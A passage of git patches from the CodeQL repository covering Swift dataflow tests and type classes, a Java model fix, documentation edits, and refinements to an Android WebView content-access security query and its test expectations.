test.swift:439:19:439:23 | SSA def(b) | +| test.swift:439:27:439:27 | y | test.swift:444:22:444:22 | y | +| test.swift:444:9:444:9 | SSA def(tuple1) | test.swift:445:12:445:12 | tuple1 | +| test.swift:444:18:444:23 | (...) | test.swift:444:9:444:9 | SSA def(tuple1) | +| test.swift:446:10:446:37 | SSA def(a) | test.swift:447:19:447:19 | a | +| test.swift:446:10:446:37 | SSA def(b) | test.swift:448:19:448:19 | b | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index f6721d3bb61..7692dc05e68 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -432,3 +432,21 @@ func testEnums() { sink(arg: y) // $ MISSING: flow=415 } } + +func testOptionals2(y: Int?) { + let x = optionalSource() + + if let a = x, let b = y { + sink(arg: a) // $ flow=259 + sink(arg: b) + } + + let tuple1 = (x, y) + switch tuple1 { + case (.some(let a), .some(let b)): + sink(arg: a) // $ MISSING: flow=259 + sink(arg: b) + default: + () + } +} From a3c7b2c3a2d1cbed1b7f17113a32fc0c18a2fb38 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Fri, 6 Jan 2023 14:34:25 -0500 Subject: [PATCH 124/381] Java: move java.lang.Math.min to the correct file --- java/ql/lib/ext/java.lang.model.yml | 1 + java/ql/lib/ext/java.math.model.yml | 1 - 2 files changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/lib/ext/java.lang.model.yml b/java/ql/lib/ext/java.lang.model.yml index 02699c278d1..259c5bcaf06 100644 --- a/java/ql/lib/ext/java.lang.model.yml +++ b/java/ql/lib/ext/java.lang.model.yml @@ -51,6 +51,7 @@ extensions: - ["java.lang", "Long", False, "longValue", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["java.lang", "Long", False, "parseLong", "(String)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.lang", "Long", False, "toString", "()", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].Element", "ReturnValue.Element", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapKey", "ReturnValue.MapKey", "value", "manual"] - ["java.lang", "Object", True, "clone", "", "", "Argument[-1].MapValue", "ReturnValue.MapValue", "value", "manual"] diff --git a/java/ql/lib/ext/java.math.model.yml b/java/ql/lib/ext/java.math.model.yml index c1e23e4204a..3056e04182a 100644 --- a/java/ql/lib/ext/java.math.model.yml +++ b/java/ql/lib/ext/java.math.model.yml @@ -6,7 +6,6 @@ extensions: - ["java.math", "BigDecimal", False, "BigDecimal", "(String)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["java.math", "BigDecimal", False, "valueOf", "(double)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.math", "BigDecimal", False, "valueOf", "(long)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - - ["java.lang", "Math", False, "min", "(int,int)", "", "Argument[0..1]", "ReturnValue", "value", "manual"] - addsTo: pack: codeql/java-all From d079c7a5efb8493956e2570264513344ead10d04 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Fri, 6 Jan 2023 14:57:24 -0500 Subject: [PATCH 125/381] Apply suggestions from code review Co-authored-by: Felicity Chapman --- docs/codeql/CONTRIBUTING.MD | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD index 0c1fe8f9532..052d816787c 100644 --- a/docs/codeql/CONTRIBUTING.MD +++ b/docs/codeql/CONTRIBUTING.MD @@ -2,14 +2,17 @@ We welcome contributions to our CodeQL docs. Want to improve existing docs or add new information you think would be helpful? Then please go ahead and open a pull request! -## Contributing to CodeQL docs on `docs.github.com` +## Contributing to CodeQL CLI docs on `docs.github.com` -**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation will appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. + +We are in the process of moving all documentation about the CodeQL CLI from [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation is published on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. This will make it easier for code scanning users to find information about using CodeQL to query their codebases. + +**Note**: For a brief time, we will have source files for CodeQL CLI documentation in two locations. During this period we will not accept changes to the old files in the `codeql` repository, only to the new files in the `docs` repository. To contribute to these docs, which are located in the [`code-scanning`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. ## Contributing to CodeQL docs on `codeql.github.com` -To make changes to the remaining documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), you can make changes to the documentation files using the GitHub UI, a codespace, or making changes locally, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), please see the [README](https://github.com/github/codeql/tree/main/docs/codeql#readme). +To make changes to the documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), you can make changes to the documentation files using the GitHub UI, a codespace, or a local text editor, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), please see the [README](https://github.com/github/codeql/blob/main/docs/codeql/README.rst). From f15291a9deff443874a5ab4c851d722fdcd0ea74 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Fri, 6 Jan 2023 15:00:43 -0500 Subject: [PATCH 126/381] Change the order of sections --- docs/codeql/CONTRIBUTING.MD | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD index 052d816787c..478c2d28ac5 100644 --- a/docs/codeql/CONTRIBUTING.MD +++ b/docs/codeql/CONTRIBUTING.MD @@ -2,8 +2,11 @@ We welcome contributions to our CodeQL docs. Want to improve existing docs or add new information you think would be helpful? Then please go ahead and open a pull request! -## Contributing to CodeQL CLI docs on `docs.github.com` +## Contributing to CodeQL docs on `codeql.github.com` +To make changes to the documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), you can make changes to the documentation files using the GitHub UI, a codespace, or a local text editor, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), please see the [README](https://github.com/github/codeql/blob/main/docs/codeql/README.rst). + +## Contributing to CodeQL CLI docs on `docs.github.com` We are in the process of moving all documentation about the CodeQL CLI from [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation is published on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. This will make it easier for code scanning users to find information about using CodeQL to query their codebases. @@ -11,8 +14,5 @@ We are in the process of moving all documentation about the CodeQL CLI from [cod To contribute to these docs, which are located in the [`code-scanning`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. -## Contributing to CodeQL docs on `codeql.github.com` - -To make changes to the documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), you can make changes to the documentation files using the GitHub UI, a codespace, or a local text editor, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-overview/), please see the [README](https://github.com/github/codeql/blob/main/docs/codeql/README.rst). From 6bb09ef289e39b0da3a9df35c80488c34f42f65a Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Jan 2023 09:43:09 +0000 Subject: [PATCH 127/381] Swift: Add integral type classes. --- .../swift/elements/type/FloatingPointType.qll | 12 +++++++ .../swift/elements/type/NumericOrCharType.qll | 35 +++++++++++++++++++ swift/ql/lib/swift.qll | 1 + 3 files changed, 48 insertions(+) create mode 100644 swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll create mode 100644 swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll diff --git a/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll b/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll new file mode 100644 index 00000000000..e5ae0ac3e7a --- /dev/null +++ b/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll @@ -0,0 +1,12 @@ +private import swift + +/** + * A floating-point type. This includes the `Float` type, the `Double`, and + * builtin floating-point types. + */ +class FloatingPointType extends Type { + FloatingPointType() { + this.getName() = ["Float", "Double"] or + this instanceof BuiltinFloatType + } +} diff --git a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll new file mode 100644 index 00000000000..9718ebe764b --- /dev/null +++ b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll @@ -0,0 +1,35 @@ +private import swift + +/** The `Character` type. */ +class CharacterType extends StructType { + CharacterType() { this.getName() = "Character" } +} + +/** + * An integer-like type. For example, `Int`, `Int16`, `Uint16`, etc. + */ +class IntegerType extends Type { + IntegerType() { + this.getName() = + ["Int", "Int8", "Int16", "Int32", "Int64", "UInt", "UInt8", "Uint16", "Uint32", "UInt64"] + or + this instanceof BuiltinIntegerType + } +} + +/** The `Bool` type. */ +class BooleanType extends Type { + BooleanType() { this.getName() = "Bool" } +} + +/** + * A numeric-like type. This includes the types `Character`, `Bool`, and all + * the integer-like types. + */ +class NumericOrCharType extends Type { + NumericOrCharType() { + this instanceof CharacterType or + this instanceof IntegerType or + this instanceof BooleanType + } +} diff --git a/swift/ql/lib/swift.qll b/swift/ql/lib/swift.qll index b72ce008427..4d79e4b73eb 100644 --- a/swift/ql/lib/swift.qll +++ b/swift/ql/lib/swift.qll @@ -10,4 +10,5 @@ import codeql.swift.elements.expr.InitializerCallExpr import codeql.swift.elements.expr.SelfRefExpr import codeql.swift.elements.decl.MethodDecl import codeql.swift.elements.decl.ClassOrStructDecl +import codeql.swift.elements.type.NumericOrCharType import codeql.swift.Unit From 9333e80def52d290f9d5231b763db23e90388165 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Mon, 9 Jan 2023 10:29:37 +0000 Subject: [PATCH 128/381] Swift: Add getVaList stub to the test. --- .../CWE-134/UncontrolledFormatString.expected | 52 +++++++++---------- .../CWE-134/UncontrolledFormatString.swift | 2 + 2 files changed, 28 insertions(+), 26 deletions(-) diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 4895b075e6f..8bb76e27b44 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -1,32 +1,32 @@ edges -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:70:28:70:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:73:28:73:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:28:77:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:78:28:78:28 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:79:46:79:46 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:88:11:88:11 | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:91:61:91:61 | tainted | nodes -| UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | -| UncontrolledFormatString.swift:68:28:68:28 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:71:28:71:28 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:72:28:72:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | semmle.label | call to String.init(contentsOf:) : | +| UncontrolledFormatString.swift:70:28:70:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:73:28:73:28 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:74:28:74:28 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:75:28:75:28 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:76:28:76:28 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:77:46:77:46 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:86:11:86:11 | tainted | semmle.label | tainted | -| UncontrolledFormatString.swift:89:61:89:61 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:77:28:77:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:78:28:78:28 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:79:46:79:46 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:88:11:88:11 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:91:61:91:61 | tainted | semmle.label | tainted | subpaths #select -| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:70:28:70:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:70:28:70:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:73:28:73:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:73:28:73:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:77:28:77:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:77:28:77:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:78:28:78:28 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:78:28:78:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:79:46:79:46 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:79:46:79:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:88:11:88:11 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:88:11:88:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:91:61:91:61 | tainted | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) : | UncontrolledFormatString.swift:91:61:91:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:64:24:64:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift index e6d1d8a2646..ff675f1249e 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.swift @@ -50,6 +50,8 @@ func NSLog(_ format: String, _ args: CVarArg...) {} func NSLogv(_ format: String, _ args: CVaListPointer) {} +func getVaList(_ args: [CVarArg]) -> CVaListPointer { return (nil as CVaListPointer?)! } + // --- tests --- func MyLog(_ format: String, _ args: CVarArg...) { From 381301e552933662b10ebf0632aa56abcdd28ae7 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Jan 2023 10:32:52 +0000 Subject: [PATCH 129/381] Update swift/ql/lib/swift.qll Co-authored-by: Geoffrey White <40627776+geoffw0@users.noreply.github.com> --- swift/ql/lib/swift.qll | 1 + 1 file changed, 1 insertion(+) diff --git a/swift/ql/lib/swift.qll b/swift/ql/lib/swift.qll index 4d79e4b73eb..552f2c99828 100644 --- a/swift/ql/lib/swift.qll +++ b/swift/ql/lib/swift.qll @@ -10,5 +10,6 @@ import codeql.swift.elements.expr.InitializerCallExpr import codeql.swift.elements.expr.SelfRefExpr import codeql.swift.elements.decl.MethodDecl import codeql.swift.elements.decl.ClassOrStructDecl +import codeql.swift.elements.type.FloatingPointType import codeql.swift.elements.type.NumericOrCharType import codeql.swift.Unit From 2ec73c50f999ff01ba01a0e2e659b544e0e71918 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 09:55:09 -0500 Subject: [PATCH 130/381] Mention WebView in alert message --- .../CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 7ccf23cc3ae..52c81dc1069 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -109,4 +109,4 @@ where not any(WebViewDisallowContentAccessConfiguration cfg).hasFlow(source, _) ) select e, - "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." + "Sensitive information may be exposed via a malicious link due to access to content:// links being allowed in this WebView." From 64668883a466e2e16127bb01a250df9e9e705bd0 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 09:59:38 -0500 Subject: [PATCH 131/381] Add good example to documentation --- .../CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp | 3 +++ java/ql/src/Security/CWE/CWE-200/ContentAccessDisabled.java | 3 +++ 2 files changed, 6 insertions(+) create mode 100644 java/ql/src/Security/CWE/CWE-200/ContentAccessDisabled.java diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp index 6f4dbb3505a..13439bf585d 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp @@ -24,6 +24,9 @@ +

    In the following (good) example, access to content:// URLs is explicitly denied.

    + +     diff --git a/java/ql/src/Security/CWE/CWE-200/ContentAccessDisabled.java b/java/ql/src/Security/CWE/CWE-200/ContentAccessDisabled.java new file mode 100644 index 00000000000..25214a69afe --- /dev/null +++ b/java/ql/src/Security/CWE/CWE-200/ContentAccessDisabled.java @@ -0,0 +1,3 @@ +WebSettings settings = webview.getSettings(); + +settings.setAllowContentAccess(false); From 972b4629c83c26c30873920592b300b26ad47808 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 10:01:38 -0500 Subject: [PATCH 132/381] Fix typo in change note --- java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md b/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md index 1f67c159788..292bc418459 100644 --- a/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md +++ b/java/ql/lib/change-notes/2022-12-21-allowcontentaccessmethod.md @@ -1,4 +1,4 @@ --- category: minorAnalysis --- -* Added `AllowContentAccessMethod` to represent the `allowContentAccess` method of the `android.webkit.WebSettings` class. +* Added `AllowContentAccessMethod` to represent the `setAllowContentAccess` method of the `android.webkit.WebSettings` class. From f626d4794ad1ebb5ff0e3150cef924b9a2073733 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 10:03:12 -0500 Subject: [PATCH 133/381] Change wording from "permit" to "allow" in id and name --- .../CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql | 6 +++--- .../2022-12-21-android-allowcontentaccess-query.md | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 52c81dc1069..d1f4f33917a 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -1,7 +1,7 @@ /** - * @name Android WebView settings permits content access - * @id java/android/websettings-permit-contentacces - * @description Access to content providers in a WebView can permit access to protected information by loading content:// links. + * @name Android WebView settings allows access to content links + * @id java/android/websettings-allow-content-access + * @description Access to content providers in a WebView can allow access to protected information by loading content:// links. * @kind problem * @problem.severity warning * @precision medium diff --git a/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md index 854da87eb54..ebd6a7b5dd5 100644 --- a/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md +++ b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md @@ -1,4 +1,4 @@ --- category: newQuery --- -* Added a new query `java/android/websettings-permit-contentacces` to detect Android WebViews which do not disable access to `content://` urls. +* Added a new query `java/android/websettings-allow-content-access` to detect Android WebViews which do not disable access to `content://` urls. From c723df3ca744ab756526f06471f5e75e45f7ba7d Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Mon, 9 Jan 2023 10:08:19 -0500 Subject: [PATCH 134/381] Fix alert message in expected file --- .../tests/WebViewContentAccess.expected | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected index 317f847279f..8116323de32 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected @@ -1,10 +1,10 @@ -| WebViewContentAccess.java:15:9:15:57 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:38:9:38:55 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:41:25:41:49 | (...)... | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:43:9:43:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:46:25:46:41 | new WebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:48:9:48:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:51:25:51:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:53:9:53:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:55:29:55:48 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:57:25:57:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:15:9:15:57 | 